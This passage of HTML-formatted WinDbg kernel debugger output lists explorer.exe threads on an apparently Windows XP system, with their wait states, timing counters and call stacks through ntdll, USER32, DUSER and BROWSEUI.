USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016affb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016affec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 824cbc28 Cid 0594.077c Teb: 7ffa9000 Win32Thread: e1c12008 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 824967c8 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82477238 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 29 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.015<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address msvcrt!_endthreadex (0x77c3a341)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b262c000 Current b262b95c Base b262c000 Limit b2629000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 11 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b262b974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b262b980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b262b9b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b262bd48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b262bd48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b262bd64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199fdbc 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199fdc0 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199fe5c 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199feb8 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199fed8 6c1e4ddc DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199ff0c 6c1de394 DUSER!CoreSC::xwProcessNL+0xab (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199ff2c 6c1da6f1 DUSER!GetMessageExA+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199ff80 77c3a3b0 DUSER!ResourceManager::SharedThreadProc+0xb6 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199ffb4 7c80b50b msvcrt!_endthreadex+0xa9 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 825c82d0 Cid 0594.0538 Teb: 7ffaf000 Win32Thread: e3306d28 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82515b00 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 1185 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.078<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:00.390<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address ntdll!RtlpWorkerThread (0x7c910760)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b2a61000 Current b2a6095c Base b2a61000 Limit b2a5e000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 9 BasePriority 7 PriorityDecrement 0 DecrementCount 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a60974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a60980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a609b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a60d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a60d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2a60d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142fd60 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fd64 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142fe00 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fe5c 77d4bcad USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142fe78 75f843c1 USER32!MsgWaitForMultipleObjects+0x1f (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fed0 75f84871 BROWSEUI!CACThread::_ThreadLoop+0xd4 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142fee0 77f68ea5 BROWSEUI!CACThread::_ThreadProc+0x1c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142fef8 7c927545 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142ff40 7c927583 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142ff60 7c927645 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142ff74 7c92761c ntdll!RtlpApcCallout+0x11 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0142ffb4 7c80b50b ntdll!RtlpWorkerThread+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 821e5020 Cid 0594.038c Teb: 7ffd9000 Win32Thread: e35f88a0 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8218f960 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 828d4690 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 6516 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:03.718<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:08.625<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b2b70c80 Current b2b705dc Base b2b71000 Limit b2b6b000 <span style="color: #0000ff">Call</span> b2b70c80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b705f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b70600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b70638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b709c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b709c8 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2b709e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fb48 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b70c98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b70cf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b70d5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b70d5c 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2b70d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3fcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3fcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3ff28 75faea19 USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00f3ffb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00f3ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 821bd020 Cid 0594.0214 Teb: 7ffa5000 Win32Thread: e2cbaa28 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 826b6870 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82868198 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 4265 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:01.875<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:03.203<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b1f4ac80 Current b1f4a5dc Base b1f4b000 Limit b1f47000 <span style="color: #0000ff">Call</span> b1f4ac80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4a5f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4a600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4a638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4a9c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4a9c8 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f4a9e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fb48 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4ac98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4acf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f4ad5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f4ad5c 7c90eb94 